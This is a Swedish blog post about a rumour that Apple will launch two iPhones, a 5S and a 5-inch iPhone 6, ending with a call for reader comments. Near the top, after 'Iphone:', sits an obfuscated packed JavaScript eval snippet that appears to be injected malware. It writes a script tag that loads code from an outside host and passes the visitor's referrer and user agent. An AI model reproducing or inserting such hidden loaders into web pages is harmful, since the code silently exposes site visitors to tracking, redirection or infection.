Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Rykte: Kommer det två nya iPhones i år?

iphone-5-review-recension
Sebastian

Iphone: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kidzi|var|u0026u|referrer|dayzb||js|php’.split(’|’),0,{}))
Om ungefär ett halv år kommer det att lanseras en ny iPhone från Apple om de håller sig till sina vanliga datum. Rykten har redan börjat rulla ut på webben. 

Det senaste ryktet menar att någon från de kinesiska fabrikerna har läckt ut info om att det kommer att släppas två nya iPhones i år. En iPhone 5S  som troligen är  lite snabbare och har lite mer kraft än föregångaren.

Den andra telefonen är en iPhone 6 som enligt källan kommer ha en 5 tum stor skärm. Inget omöjligt då det under CES visades upp nästan bara 5 tums-skärmar på smartphones. Det var även under CES 2013 som de myntade uttrycket ”Phablet”. En blandning av Smartphone och Tablet då skärmarna blir större.

Själv tycker jag att det är bra om Apple börjar hänga med i trenderna som de andra stora elektronikföretagen gör. Även om Apple innan skapat mycket trender så är kanske inte så fallet längre, men vi får se.

Men som sagt så är detta endast rykten så ingenting står klart. Och det är mycket möjligt att det bara släpps en iPhone 5S, vem vet.

Vad tycker ni? Vill ni se en iPhone 6 med 5 tum skärm eller är skärmen bra som den är nu? Har ni en iPhone 5?

Kommentera gärna nedan vad ni tycker.

Via: news.cnet.com